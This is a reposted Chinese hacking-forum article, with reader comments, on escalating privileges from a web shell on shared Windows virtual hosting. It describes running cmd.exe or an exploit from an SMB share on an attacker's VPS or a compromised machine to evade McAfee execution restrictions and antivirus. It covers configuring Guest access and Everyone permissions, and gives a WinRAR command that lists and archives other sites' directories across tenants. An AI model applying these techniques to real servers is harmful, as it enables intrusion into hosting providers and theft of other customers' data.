虚拟主机提权,调用远程路径去执行CMD

admin 2021年4月3日19:25:15评论92 views字数 1441阅读4分48秒阅读模式

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?

原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:progra~1和c:windowssystem32)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。

下面是个人的小技巧:

1: 是否大家会想到调用远程路径去执行CMD,比如(\x.x.x.xtestcmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:

1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典,所在共享目录程序给Everyone权限,如图:

2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)

2:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,然后shell里面:

C:progra~1WinRARRar.exe a -k -r -s -m1 c:windowstempxx.rar E:freehostxxxasdfdsafsaf.jpg

这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。。

就是提权的一点小技巧,大牛勿喷。

回头一看,文笔真烂,算了,不改了,老婆催睡觉了,各位黑阔们,晚安。。。。。。。。。

摘自:https://www.t00ls.net/viewthread.php?tid=21282

留言评论(旧系统):

fish @ 2013-02-27 20:50:51

找不到执行目录又多了个办法,感谢公布

本站回复:

lol.

佚名 @ 2013-03-17 21:34:37

shell里面执行出现“找不到网络路径” 求解 我用VPS搭建的 本地倒是没问题 ,是不是因为shell里面的temp目录没有执行权限导致的吧,求解!

本站回复:

不清楚。不过,找不到网络路径,肯定不是目录权限问题,检查网络吧。

佚名 @ 2013-03-20 19:02:04

我的VPS是美国的 我本地是电信的网 本地执行貌似没问题 都是先下载了在执行的 shell里面就直接报 找不到网络路径 求解

本站回复:

佚名 @ 2013-06-15 13:09:17

远程调用为什么能成功,EXP在开启共享的VPS上,并不在虚拟主机上,如何可以通过EXP溢出提权

本站回复:

因为在 Windows 共享服务中“读写”网络文件和本地文件是一模一样的,Exe 自然可以直接执行,只是路径不一样而已。

猪猪侠 @ 2013-08-30 19:25:36

"首先在目标站找个图片地址"这句话指的是找目标站的图片网址?如果不是,那就是找物理地址吧?如果知道了图片的物理地址,根目录肯定就知道,为什么还要打包图?直接打包根目录不行?求解答

本站回复:

确实略狗血啊,都知道路径了,为毛还要去列……

文章来源于lcx.cc:虚拟主机提权,调用远程路径去执行CMD

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:25:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   虚拟主机提权,调用远程路径去执行CMDhttps://cn-sec.com/archives/322356.html

发表评论

匿名网友 填写信息